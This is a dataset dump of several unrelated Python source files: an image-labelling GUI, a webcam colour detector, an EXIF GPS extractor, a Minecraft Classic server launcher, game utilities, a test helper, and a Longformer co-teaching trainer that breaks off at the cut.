self.button_frame2 = Frame(self.window)\r\n self.button_frame2.pack(side=LEFT, fill=Y)\r\n self.img_frame = Frame(self.window)\r\n self.img_frame.pack(anchor=tkinter.CENTER, expand=True)\r\n labelframe1 = LabelFrame(self.button_frame, text='')\r\n labelframe1.pack(fill=\"both\", expand=\"yes\")\r\n self.labelframe3 = LabelFrame(self.window, text='')\r\n self.labelframe3.pack(side=BOTTOM, fill=Y)\r\n labelframe2 = LabelFrame(self.button_frame2, text='Working panel')\r\n labelframe2.pack(fill=\"both\", expand=\"yes\")\r\n self.choose_button = Button(labelframe2, text='import folder', height=2, width=10, command=self.select)\r\n self.choose_button.grid(row=0, column=0)\r\n self.start_button = Button(labelframe2, text='start', height=2, width=10, command=self.start)\r\n self.start_button.grid(row=1, column=0)\r\n 
self.start_button.config(state=\"disabled\")\r\n self.prev_button = Button(labelframe1, text='Prev', height=1, width=10,command=self.prev)\r\n self.prev_button.grid(row=0, column=1)\r\n self.prev_button.config(state=\"disabled\")\r\n self.next_button = Button(labelframe1, text='Next', height=1, width=10,command=self.next)\r\n self.next_button.grid(row=0, column=2)\r\n self.next_button.config(state=\"disabled\")\r\n self.cancel_button = Button(labelframe2, text='cancel', height=2, width=10,command=self.cancel)\r\n self.cancel_button.grid(row=3, column=0)\r\n self.cancel_button.config(state=\"disabled\")\r\n self.addt_button = Button(labelframe2, text='Add cell', height=2, width=10,cursor=\"plus\",command=self.add_tracker)\r\n self.addt_button.grid(row=2, column=0)\r\n self.addt_button.config(state=\"disabled\")\r\n temp = ttk.Separator(labelframe2, orient=HORIZONTAL)\r\n temp.grid(row=4, column=0, pady=10, sticky=\"ew\")\r\n self.wsize_label=Label(labelframe2,text='Window Size: 100')\r\n self.wsize_label.grid(row=5, column=0,pady=10)\r\n size_frame=Frame(labelframe2)\r\n size_frame.grid(row=6, column=0)\r\n self.up_size = Button(size_frame, text='+', height=2, width=5,command=self.up_size)\r\n self.up_size.grid(row=0, column=0)\r\n self.down_size = Button(size_frame, text='-', height=2, width=5,command=self.down_size)\r\n self.down_size.grid(row=0, column=1)\r\n self.var = IntVar()\r\n self.def_size=Checkbutton(labelframe2, text=\"set as default size\",variable=self.var,command=self.change_size)\r\n self.def_size.grid(row=7, column=0)\r\n temp2 = ttk.Separator(labelframe2, orient=HORIZONTAL)\r\n temp2.grid(row=8, column=0, pady=10, sticky=\"ew\")\r\n self.video_selected=False\r\n self.tracker_num=0\r\n self.Icons=[]\r\n self.add_selected=False\r\n self.vid=None\r\n if os.path.exists('window_size.txt'):\r\n with open('window_size.txt', \"r\") as ins2:\r\n lines = ins2.read().splitlines()\r\n self.p_size=int(lines[0])\r\n ss = 'Window Size: ' + str(self.p_size)\r\n self.wsize_label.config(text=ss)\r\n\r\n else:\r\n self.p_size=100\r\n self.window.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n\r\n def close_help(self):\r\n self.helpmaster.destroy()\r\n def change_size(self):\r\n #print(self.var.get())\r\n if self.var.get():\r\n ff=open('window_size.txt','w')\r\n ff.write(str(self.p_size)+'\\n')\r\n ff.close()\r\n def up_size(self):\r\n self.p_size+=5\r\n ss='Window Size: '+str(self.p_size)\r\n self.wsize_label.config(text=ss)\r\n print(self.tracker_num)\r\n self.load_all()\r\n\r\n\r\n\r\n def down_size(self):\r\n self.p_size-=5\r\n ss='Window Size: '+str(self.p_size)\r\n self.wsize_label.config(text=ss)\r\n print(self.tracker_num)\r\n self.load_all()\r\n\r\n\r\n def get_frame(self,frame_number):\r\n if frame_number>=0 and frame_number\", lambda event, a=k: self.right_click(event,a))\r\n self.canvas.create_rectangle(xx-self.p_size,yy-self.p_size,xx+self.p_size,yy+self.p_size)\r\n self.canvas.create_oval(xx-1,yy-1,xx+1,yy+1)\r\n self.cell_mid.append([xx,yy])\r\n self.rect_xy.append([xx-self.p_size,yy-self.p_size,xx+self.p_size,yy+self.p_size])\r\n ff=open(self.out_folder + '/'+tracker_name+'.txt', 'w')\r\n ff.write(str(int(xx/self.resize_factor)) + ',' + str(int(yy/self.resize_factor)) + '\\n')\r\n ff.close()\r\n\r\n def right_click(self,event,k):\r\n self.menu = Menu(self.canvas, tearoff=0)\r\n self.menu.add_radiobutton(label='label and save',command=lambda a=k: self.tag(k))\r\n self.is_right=True\r\n self.menu.post(event.x_root, event.y_root)\r\n def load_all(self):\r\n for child in 
self.canvas.winfo_children():\r\n child.destroy()\r\n img, ret = self.get_frame(self.frame_counter)\r\n ww = np.size(img,0)\r\n hh = np.size(img,1)\r\n print(hh,ww)\r\n self.photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(img))\r\n self.canvas.create_image(0, 0, image=self.photo, anchor=tkinter.NW)\r\n self.tracker_num = 0\r\n self.Icons = []\r\n self.rect_xy = []\r\n self.cell_mid = []\r\n self.add_selected = False\r\n self.is_right = False\r\n self.out_folder = self.video_folder + '/' + self.frame_names[self.frame_counter]\r\n if os.path.exists(self.out_folder) == False:\r\n os.makedirs(self.out_folder)\r\n else:\r\n\r\n names=[]\r\n for root, dirnames, filenames in os.walk(self.out_folder):\r\n for filename in filenames:\r\n if filename.endswith(\".txt\"):\r\n names.append(int(filename.split('.')[0]))\r\n if len(names)>0:\r\n self.tracker_num =max(names)\r\n for k in range(0,self.tracker_num):\r\n tracker_name = str(k+1)\r\n ff = open(self.out_folder+'/'+tracker_name+'.txt', 'r')\r\n aa = ff.readline()\r\n xx = int(aa.split(',')[0])*self.resize_factor\r\n yy = int(aa.split(',')[1])*self.resize_factor\r\n self.Icons.append(Icon(tracker_name))\r\n self.Icons[k].attach(self.canvas, xx, yy, self.p_size)\r\n self.Icons[k].label.bind(\"\", lambda event, a=k: self.right_click(event, a))\r\n self.canvas.create_rectangle(xx - self.p_size, yy - self.p_size, xx + self.p_size,\r\n yy + self.p_size)\r\n self.canvas.create_oval(xx - 1, yy - 1, xx + 1, yy + 1)\r\n self.cell_mid.append([xx, yy])\r\n self.rect_xy.append([xx - self.p_size, yy - self.p_size, xx + self.p_size, yy + self.p_size])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def start(self):\r\n\r\n self.start_button.config(state=\"disabled\")\r\n self.choose_button.config(state=\"disabled\")\r\n for child in self.img_frame.winfo_children():\r\n child.destroy()\r\n self.tracker_num=0\r\n self.Icons=[]\r\n self.rect_xy=[]\r\n self.cell_mid=[]\r\n self.add_selected = False\r\n self.is_right=False\r\n #self.window_size=100\r\n self.next_button.config(state=\"normal\")\r\n self.prev_button.config(state=\"normal\")\r\n self.cancel_button.config(state=\"normal\")\r\n self.addt_button.config(state=\"normal\")\r\n self.prev_label=0\r\n if os.path.exists('output') == False:\r\n os.makedirs('output')\r\n out_name = self.video_source.split('/')[-1]\r\n if os.path.exists('output/' + out_name) == False:\r\n os.makedirs('output/' + out_name)\r\n matches = []\r\n names=[]\r\n for root, dirnames, filenames in os.walk(self.video_source):\r\n for filename in filenames:\r\n if filename.endswith(\".jpg\"):\r\n matches.append(os.path.join(root, filename))\r\n names.append(filename)\r\n self.frames=matches\r\n self.frame_names=names\r\n self.frame_num=len(matches)\r\n self.video_folder='output/' + out_name\r\n #img=cv2.imread(matches[0])\r\n img =np.asanyarray( PIL.Image.open(matches[0]))\r\n self.width=np.size(img,1)\r\n self.height=np.size(img,0)\r\n self.resize_factor = compute_resize_factor(self.height, self.width, self.heightpixels, self.widthpixels)\r\n #img,ret=self.get_frame(0)\r\n #ww = np.size(img,0)\r\n #hh = np.size(img,1)\r\n #print(hh,ww)\r\n #print(self.height, self.width)\r\n #print(int(self.height * self.resize_factor),int(self.width * self.resize_factor))\r\n self.canvas = tkinter.Canvas(self.img_frame, width=int(self.width*self.resize_factor), height=int(self.height*self.resize_factor))\r\n self.canvas.pack()\r\n self.canvas.bind('', self.click)\r\n self.canvas.dnd_accept = self.dnd_accept\r\n self.frame_counter = 
-1\r\n self.next()\r\n\r\n\r\n\r\n def click_bar(self,event,k):\r\n print('click:'+str(k))\r\n def click(self,event):\r\n if self.add_selected:\r\n self.add_selected=False\r\n self.window.config(cursor='arrow')\r\n self.add_tracker2(event.x,event.y)\r\n if self.is_right:\r\n self.menu.destroy()\r\n self.is_right = False\r\n self.resume()\r\n\r\n\r\n def select(self):\r\n for child in self.img_frame.winfo_children():\r\n child.destroy()\r\n #self.filename = filedialog.askopenfilename(initialdir=\"/home\", title=\"Select a file\",\r\n # filetypes=((\"Video files\", \"*.mp4\"), (\"all files\", \"*.*\")))\r\n dirr = os.getcwd()\r\n self.filename = filedialog.askdirectory(initialdir=dirr,\r\n title=\"Select a folder\",\r\n )\r\n if self.filename!=None:\r\n\r\n self.start_button.config(state=\"normal\")\r\n self.video_source = self.filename\r\n\r\n\r\n\r\n def next(self):\r\n self.frame_counter+=1\r\n if self.frame_counter==self.frame_num:\r\n self.frame_counter=0\r\n img,ret=self.get_frame(self.frame_counter)\r\n if ret:\r\n self.load_all()\r\n else:\r\n self.frame_counter -= 1\r\n\r\n def prev(self):\r\n self.frame_counter-=1\r\n img,ret=self.get_frame(self.frame_counter)\r\n if ret:\r\n self.load_all()\r\n else:\r\n self.frame_counter += 1\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def tag(self,cell_num):\r\n #choosed= eg.buttonbox(\"Choose the correct label? (if you close this window, Nothing will be saved)\",\r\n # choices=[\"Healthy\", \"First type\", \"Second type\",\"Unknown\"])\r\n ch=my_Buttonbox(self.window)\r\n choosed=ch.label\r\n k=cell_num\r\n if type(choosed)==int:\r\n label=int(choosed)\r\n ff = open(self.out_folder + '/' + str(k+1) + '.txt', 'r')\r\n aa=ff.readline()\r\n ff.close()\r\n ff = open(self.out_folder + '/' + str(k+1) + '.txt', 'w')\r\n ff.write(aa+str(label)+'\\n')\r\n ff.write(str(self.p_size) + '\\n')\r\n ff.close()\r\n\r\n\r\n\r\n\r\n def cancel(self):\r\n for child in self.img_frame.winfo_children():\r\n child.destroy()\r\n for child in self.labelframe3.winfo_children():\r\n child.destroy()\r\n self.prev_button.config(state=\"disabled\")\r\n self.next_button.config(state=\"disabled\")\r\n self.cancel_button.config(state=\"disabled\")\r\n self.addt_button.config(state=\"disabled\")\r\n self.start_button.config(state=\"normal\")\r\n self.choose_button.config(state=\"normal\")\r\n\r\n\r\n\r\n\r\n\r\n def on_closing(self):\r\n\r\n self.window.destroy()\r\n\r\n\r\n def dnd_accept(self, source, event):\r\n return self\r\n def dnd_enter(self, source, event):\r\n k=self.name_dict[source.name]\r\n if k>=0:\r\n self.rect_xy[k]=None\r\n self.canvas.focus_set() # Show highlight border\r\n x, y,mx,my = source.where(self.canvas, event,self.p_size)\r\n if k>=0:\r\n self.cell_mid[k][0]=mx\r\n self.cell_mid[k][1]=my\r\n\r\n x1, y1, x2, y2 = source.canvas.bbox(source.id)\r\n dx, dy = x2-x1, y2-y1\r\n self.dndid = self.canvas.create_rectangle(x, y, x+dx, y+dy)\r\n self.dnd_motion(source, event)\r\n\r\n def dnd_motion(self, source, event):\r\n k=self.name_dict[source.name]\r\n x, y,mx,my = source.where(self.canvas, event,self.p_size)\r\n if k>=0:\r\n self.cell_mid[k][0]=mx\r\n self.cell_mid[k][1]=my\r\n self.rect_xy[k] =[self.cell_mid[k][0]-self.p_size,self.cell_mid[k][1]-self.p_size,self.cell_mid[k][0]+self.p_size,self.cell_mid[k][1]+self.p_size]\r\n x1, y1, x2, y2 = self.canvas.bbox(self.dndid)\r\n self.canvas.move(self.dndid, x-x1, y-y1)\r\n\r\n def dnd_leave(self, source, event):\r\n self.window.focus_set() # Hide highlight border\r\n self.canvas.delete(self.dndid)\r\n self.dndid = 
None\r\n\r\n def dnd_commit(self, source, event):\r\n k = self.name_dict[source.name]\r\n self.dnd_leave(source, event)\r\n x, y,mx,my = source.where(self.canvas, event,self.p_size)\r\n if k>=0:\r\n self.cell_mid[k][0]=mx\r\n self.cell_mid[k][1]=my\r\n source.attach(self.canvas, x, y)\r\n\r\n\r\na=App1(tkinter.Tk(),'Nimaad labeling App')\r\na.window.mainloop()\r\n","repo_name":"nimaadmed/Ground-Truth-Labeler","sub_path":"Image_labeler/Image_labeler.py","file_name":"Image_labeler.py","file_ext":"py","file_size_in_byte":19792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7833175845","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,1080)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,720)\n\nwhile True:\n ret , frame = cap.read()\n hsv_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n height,width,_ = hsv_frame.shape\n \n center_x = int(width/2)\n center_y = int(height/2)\n \n pixel_center = hsv_frame[center_y, center_x] \n hue_value = pixel_center[0]\n \n color = \"Undefined\"\n if hue_value < 5 :\n color = \"Red\"\n elif hue_value < 22 :\n color = \"Orange\"\n elif hue_value < 33 :\n color = \"Yellow\"\n elif hue_value < 78 :\n color = \"Green\"\n elif hue_value < 131 :\n color = \"Blue\"\n elif hue_value < 170 :\n color = \"Violet\" \n else : \n color = \"Red\"\n \n pixel_center_bgr = frame[center_y, center_x] \n b,g,r = int(pixel_center_bgr[0]),int(pixel_center_bgr[1]),int(pixel_center_bgr[2])\n \n cv2.rectangle(frame,(center_x-200,10),(center_x+200,120),(255,255,255),-1)\n cv2.putText(frame,color,(center_x-200,100),0,3,(b,g,r),5)\n cv2.circle(frame,[center_x,center_y],2,(0,0,0),2)\n \n cv2.imshow('frame',frame)\n if cv2.waitKey(27) == ord('q') :\n break\n \ncap.release() \ncv2.destroyAllWindows() ","repo_name":"MohammedHameds/Color-Recognition-By-OpenCV","sub_path":"detect colors using HSV.py","file_name":"detect colors using HSV.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24394435263","text":"import argparse\nfrom xtractEXIF import *\nfrom os import listdir\nfrom os.path import isfile, isdir, join\n\nRED = '\\033[0;31m'\nGREEN = '\\033[0;32m'\nRESET = '\\033[0m'\n\ndef print_banner():\n with open('banner.txt', 'r') as fd:\n print('\\n'+fd.read())\n\n\ndef getImageFiles(dir):\n if not isdir(dir):\n return None\n onlyfiles = [f for f in listdir(dir) if isfile(join(dir, f))]\n return onlyfiles\n\n\ndef main():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-s', '--single', help='Specify a single image to extract the Data')\n group.add_argument('-d', '--dir', help='Specify a file with images to extract the Data')\n parser.add_argument('-v', '--verbose', help='need more verbose ouput', action='store_true')\n parser.add_argument('-q', '--quiet', help='dont clutter my terminal with garbage', action='store_true')\n\n args = parser.parse_args()\n\n if not args.quiet:\n print_banner()\n\n if args.single:\n gps = getGPS(args.single)\n if gps:\n print(GREEN + 'GPS data found: ')\n to_print = f'{GREEN}{args.single}: {gps[\"latitude\"][\"direction\"]} {gps[\"latitude\"][\"value\"]} {gps[\"longitude\"][\"direction\"]} {gps[\"longitude\"][\"value\"]}{RESET}'\n to_print = '{0}: {1} {2} {3} {4}: https://www.google.com/maps/search/?api=1&query={2},{4}'.format(args.single, gps['latitude']['direction'], gps['latitude']['value'], 
gps['longitude']['direction'], gps['longitude']['value'])\n print(GREEN + to_print + RESET)\n else:\n print(RED + '[-] No GPS data found on the image' + RESET)\n elif args.dir:\n files = getImageFiles(args.dir)\n if not files:\n print(RED + 'No images found in the directory' + RESET)\n else:\n print(GREEN, end='')\n for file in files:\n gps = getGPS(join(args.dir, file))\n if not gps:\n continue\n to_print = '{0}: {1} {2} {3} {4}: https://www.google.com/maps/search/?api=1&query={2},{4}'.format(file, gps['latitude']['direction'], gps['latitude']['value'], gps['longitude']['direction'], gps['longitude']['value'])\n print(to_print)\n print(RESET, end='')\n else:\n parser.print_help()\n exit(2)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Anex007/falcon","sub_path":"falcon.py","file_name":"falcon.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43010625990","text":"from subprocess import PIPE, Popen\r\nfrom datetime import datetime\r\nfrom threading import Timer\r\nfrom shutil import copy\r\nfrom os import system\r\nimport schedule\r\n\r\nstart_cmd = \"java -Xms512M -Xmx512M -Dhttp.proxyHost=betacraft.pl -cp minecraft-server.jar com.mojang.minecraft.server.MinecraftServer\"\r\nserver_config = {}\r\n\r\n\r\ndef logger(string):\r\n now_hour = datetime.now().hour\r\n now_minute = datetime.now().minute\r\n now_second = datetime.now().second\r\n if len(str(now_hour)) == 1: now_hour = \"0\" + str(now_hour)\r\n if len(str(now_minute)) == 1: now_minute = \"0\" + str(now_minute)\r\n if len(str(now_second)) == 1: now_second = \"0\" + str(now_second)\r\n time = str(now_hour) + \":\" + str(now_minute) + \":\" + str(now_second)\r\n\r\n print(\" \" + time + \" \" + string)\r\n\r\n\r\ndef getServerConfig():\r\n with open('server.properties') as f:\r\n for line in f:\r\n if \"=\" in line:\r\n name, value = line.split(\"=\", 1)\r\n server_config[name.strip()] = value.strip()\r\n\r\n\r\ndef createBackup():\r\n now = str(datetime.now())[:19]\r\n now = now.replace(\":\", \"-\")\r\n now = now.replace(\" \", \"_\")\r\n\r\n copy(\"server_level.dat\", \".\\\\backups\\\\server_level_backup_\" + str(now) + \".dat\")\r\n logger(\"Level backup created\")\r\n\r\n\r\ndef autoBackupThread():\r\n i = 1\r\n Timer(i, autoBackupThread).start()\r\n schedule.run_pending()\r\n\r\n\r\ndef serverConsoleThread():\r\n i = 1\r\n Timer(i, serverConsoleThread).start()\r\n while process.poll() is None:\r\n server_output = process.stdout.readline()\r\n print(server_output)\r\n\r\n\r\ngetServerConfig()\r\nsystem(\"title Classic Revived 0.0.18a_02 - Server Port: \" + server_config[\"port\"])\r\nprocess = Popen(\"cmd /c \" + start_cmd, stdin=PIPE, stdout=PIPE)\r\nschedule.every(6).hours.do(createBackup)\r\nlogger(\"Scheduling backups\")\r\nautoBackupThread()\r\ncreateBackup()\r\n","repo_name":"Liathers/Classic-server-script","sub_path":"start server.py","file_name":"start server.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33424746302","text":"from config import *\nimport pygame\nimport time\nimport math\n\n\npygame.init()\n\n\ndef f_pass():\n pass\n\n\ndef interpolate_avg(old, new, speed):\n return old + (new - old) * speed\n\n\ndef clamp(val, min, max):\n if val < min:\n return min\n elif val > max:\n return max\n else:\n return val\n\n\ndef clamp_min(val, min):\n if val < min:\n return min\n else:\n return 
val\n\n\ndef clamp_max(val, max):\n if val > max:\n return max\n else:\n return val\n\n\ndef rel_bool(val): # shit name (relative bool??????)\n if val:\n return 1\n else:\n return -1\n\n\ndef get_scaled_mousepos(scale):\n mpos = pygame.mouse.get_pos()\n\n return (mpos[0] / scale, mpos[1] / scale)\n\n\ndef get_distance(pos1, pos2):\n distX = pos2[0] - pos1[0]\n distY = pos2[1] - pos1[1]\n\n return math.sqrt((distX ** 2) + (distY ** 2))\n\n\ndef get_angle(pos1, pos2):\n diffX = pos2[0] - pos1[0]\n diffY = pos2[1] - pos1[1]\n\n if diffX == 0: # TODO might be able to remove this\n diffX += 1\n\n angle = math.atan(diffY / diffX)\n\n if pos2[0] < pos1[0]:\n angle += math.pi\n\n return angle\n\ndef get_visual_position(x, y, z):\n return (\n x * TILE_WIDTH - z * TILE_WIDTH,\n z * TILE_STAGGER + x * TILE_STAGGER - y * TILE_HEIGHT\n )\n\n# Dynamic debug print\ndebug_font = pygame.font.Font(None, 24)\ndebug_lines = []\n\n\ndef debug_clear():\n debug_lines.clear()\n\n\ndef debug_add(val):\n debug_lines.append(val)\n\n\ndef debug_draw(x=8, y=8):\n line_height = 16\n line_counter = 0\n surf_render = pygame.display.get_surface() # final surface to render to\n\n for l in debug_lines:\n # temporary surface for text alone\n surf_text = debug_font.render(str(l), True, \"White\")\n rect_text = surf_text.get_rect(\n topleft=(x, y + line_counter * line_height)) # text position\n\n pygame.draw.rect(surf_render, \"Black\", rect_text)\n surf_render.blit(surf_text, rect_text)\n\n line_counter += 1\n\n# Debugging timers\n\nclass DebugTimer:\n def __init__(self, label=\"\"):\n self.reset()\n self.label = label\n\n def reset(self):\n self.time_start = 0\n self.time_stop = 0\n self.value = 0\n self.value_avg = 0\n self.value_max = 0\n\n def start(self):\n if DEBUG_TIMERS:\n self.time_start = time.time()\n \n def stop(self):\n if DEBUG_TIMERS:\n self.time_stop = time.time()\n\n # Maximum calculation\n self.value_max = max(self.value_max, self.time_stop - self.time_start)\n\n # Duration calculation\n self.value = self.time_stop - self.time_start\n\n # Average calculation\n if self.value_avg <= 0: # Is this the timer's first run?\n self.value_avg += self.value\n else:\n self.value_avg += self.value\n self.value_avg /= 2\n\n def get_val(self):\n return int(self.value * 1000)\n \n def get_avg(self):\n return int(self.value_avg * 1000)\n \n def get_max(self):\n return int(self.value_max * 1000)\n \ndebug_timers = {\n \"worldgen\": DebugTimer(\"World generation\"),\n \"chunkcache\": DebugTimer(\"Chunk caching\"),\n \"cameradraw\": DebugTimer(\"Camera drawing\"),\n \"entityupdate\": DebugTimer(\"Entity updating\")\n}","repo_name":"Driftini/wanderlust","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35008298276","text":"import unittest\n\n\nclass CollectionTest(unittest.TestCase):\n\n def assertList(self, result, expect):\n # Verifies lists have the same contents\n lhs = [r for r in result]\n lhs.sort()\n rhs = list(expect)\n rhs.sort()\n if not lhs and rhs or rhs and not lhs:\n self.fail(\n 'One of the lists is empty: ' + str(lhs) + \" != \" + str(rhs))\n for i in lhs:\n if i not in rhs:\n self.fail(str(i) + ' is not in ' + str(rhs))\n for i in rhs:\n if i not in lhs:\n self.fail(str(i) + ' is not in ' + str(lhs))\n\n def assertDictContents(self, result, expect, exact=True):\n for r, e in zip(sorted(result.items()), sorted(expect.items())):\n if r[0] != e[0]: # compare keys\n 
self.fail(\"Dictionary keys: %s != %s\\n\"\n \"Dictionaries not Equal: result: %s, expect: %s\" %\n (str(r[0]), str(e[0]), result, expect))\n base_message = (\"Dictionary key contents %s mismatch: key: %s\\n\"\n \"result contents: %s\\n\"\n \"expect contents: %s\\n\"\n \"result: %s\\n expect: %s\\n\")\n if type(r[1]) != type(e[1]):\n self.fail(base_message % (\"type\", str(r[0]), str(r[1]),\n str(e[1]), result, expect))\n if isinstance(r[1], basestring):\n if r[1] != e[1]:\n self.fail(base_message % (\"string\", str(r[0]), str(r[1]),\n str(e[1]), result, expect))\n elif isinstance(r[1], (list, tuple, set)):\n if sorted(r[1]) != sorted(e[1]):\n self.fail(base_message % (\"list\", str(r[0]), str(r[1]),\n str(e[1]), result, expect))\n elif isinstance(r[1], dict):\n if not self.assertDictContents(r[1], e[1]):\n self.fail(base_message % ('dictionary', str(r[0]),\n str(r[1]), str(e[1]), result,\n expect))\n return True\n","repo_name":"duikboot/snippets","sub_path":"extratest.py","file_name":"extratest.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36690551566","text":"# 다중 상속 연습\n\nclass Animal:\n def move(self):\n pass\n \n \nclass Dog(Animal):\n name = '구름이'\n \n def move(self):\n print('구름이는 두 달에 한 번씩 미용실에 간다.')\n \n \nclass Cat(Animal):\n name = '야옹이'\n \n def move(self):\n print('야옹이는 한 달에 한 번씩 pc방에 간다.')\n print('밤에 눈빛이 빛난다.')\n\nclass Wolf(Dog, Cat):\n pass\n\nclass Fox(Cat, Dog):\n def move(self):\n print('난 여우라고 해')\n \n def foxMethod(self):\n print('여우 고유 메서드')\n \ndog = Dog()\nprint(dog.name)\ndog.move()\nprint(\"=\" * 50)\n\ncat = Cat()\nprint(cat.name)\ncat.move()\nprint(\"=\" * 50) \n\nwolf = Wolf()\nprint(wolf.name)\nwolf.move()\nprint(\"=\" * 50)\n\nfox = Fox()\nprint(fox.name)\nfox.move()\nfox.foxMethod()\nprint(\"=\" * 50)\n\nprint(Wolf.__mro__) # 클래스 탐색 순서 : (, , , , )\nprint(Fox.__mro__)\nprint(\"=\" * 50)\n\nsbs = wolf\nsbs.move()\nprint(\"=\" * 50)\n\nsbs = fox\nsbs.move()\nprint(\"=\" * 50)\n\nanimals = (dog, cat, wolf, fox)\nfor a in animals:\n a.move()\n print()\n\n\n\n\n\n\n \n","repo_name":"Youkwangjin/python","sub_path":"pypro1/pack2/test31.py","file_name":"test31.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5593904085","text":"import datetime\nimport time\n\nimport numpy\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\nfrom transformers import LongformerForSequenceClassification, AdamW\n\nfrom Models.Base.trainer_base import Trainer_Base\nfrom Models.Longformer_Classify.eval_model import Eval_Model_For_Long\nfrom Models.Longformer_Classify.predict_unlabel import Predicter\nfrom Models.coteaching_longformer.dataset_for_long import Dataset_Long, Collect_FN_CoT\nfrom compent.checkpoint import CheckPointer_Normal\nfrom compent.comm import is_main_process, synchronize, get_rank\nfrom compent.metric_logger import MetricLogger\nfrom compent.utils import move_to_device, reduce_loss_dict\n\ndevice = torch.device('cuda')\n\nbatch_size = 3\n\n\nclass Trainer_Longformer_CoT(Trainer_Base):\n def __init__(self, cfg, logger, distributed, sentences_all):\n super(Trainer_Longformer_CoT, self).__init__(cfg = cfg, logger = logger, distributed = distributed)\n self.checkpointer = CheckPointer_Normal(cfg = cfg, logger = logger, rank = get_rank())\n dataloader_eval = 
self.__build_dataloader_eval_longformer__(sentences_all.val_sentence,\n sentences_all.val_GT_label,\n for_train = False)\n self.evaler = Eval_Model_For_Long(self.cfg, self.logger, distributed = True, rank = self.rank,\n dataloader_eval = dataloader_eval)\n\n def __build_dataloader_coteaching__(self, sentences, labels, GT_label, for_train):\n collect_fn = Collect_FN_CoT()\n dataset = Dataset_Long(sentences, labels, GT_label)\n sampler = DistributedSampler(dataset, shuffle = for_train)\n dataloader = DataLoader(dataset, batch_size = batch_size, sampler = sampler,\n collate_fn = collect_fn)\n return dataloader\n\n def train_model(self, sentences, labels, GT_label = None, finetune_from_pretrain = True):\n self.logger.info('finetune distributed:{}'.format(self.distributed))\n\n sentences, labels, GT_label = self.upsample_balance_with_one_extra(sentences, labels, GT_label)\n # sample_number_per_class = self.get_classes_count(labels)\n # self.logger.info('sample_number_per_class:{}'.format(sample_number_per_class))\n\n dataloader_train = self.__build_dataloader_coteaching__(sentences, labels, GT_label, for_train = True)\n\n self.logger.info('finetune from pretrain, load pretrain model')\n self.model1 = LongformerForSequenceClassification.from_pretrained('allenai/longformer-base-4096',\n num_labels = self.cfg.model.number_classes,\n gradient_checkpointing = True)\n self.model1.train()\n self.model1 = self.model1.to(device)\n if (self.distributed):\n model1 = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model1)\n self.model1 = torch.nn.parallel.DistributedDataParallel(\n model1, device_ids = [self.rank], output_device = self.rank, # find_unused_parameters=True\n )\n\n self.model2 = LongformerForSequenceClassification.from_pretrained('allenai/longformer-base-4096',\n num_labels = self.cfg.model.number_classes,\n gradient_checkpointing = True)\n self.model2.train()\n self.model2 = self.model2.to(device)\n if (self.distributed):\n model2 = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model2)\n self.model2 = torch.nn.parallel.DistributedDataParallel(\n model2, device_ids = [self.rank], output_device = self.rank, # find_unused_parameters=True\n )\n\n self.logger.info('rank:{},build eval dataset...'.format(self.rank))\n\n acc = self.__do_train__(dataloader = dataloader_train)\n self.logger.info('acc:{}'.format(acc))\n\n def get_num_remember(self):\n tail_keep = 1\n ans = numpy.ones(9000, dtype = numpy.int) * tail_keep\n ans[:300] = batch_size\n ans[300:800] = 2\n self.logger.info(ans)\n self.logger.visdom_text('remember number:{}'.format(str(ans)), win_name = 'remember number')\n return ans\n\n def __do_train__(self, dataloader):\n self.logger.info('start training')\n self.model1.train()\n self.model2.train()\n\n meters = MetricLogger(delimiter = \" \")\n end = time.time()\n\n optimizer1 = AdamW(self.model1.parameters(), lr = 1e-5)\n optimizer2 = AdamW(self.model2.parameters(), lr = 1e-5)\n\n remember_num = self.get_num_remember()\n\n best_res_1 = 0\n best_res_2 = 0\n all_best = 0\n\n total_epoch = 3\n total_itr = 0\n\n for epoch in range(total_epoch):\n self.logger.info('total epoch:{}, cur epoch:{}'.format(total_epoch, epoch))\n dataloader.sampler.set_epoch(epoch)\n for iteration, batch in enumerate(dataloader):\n total_itr += 1\n data_time = time.time() - end\n batch = move_to_device(batch)\n optimizer1.zero_grad()\n optimizer2.zero_grad()\n # input_ids: [16,128] label_id:[16]\n output1 = self.model1(input_ids = batch['input_ids'],\n attention_mask = batch['attention_mask'])\n pred_1 = 
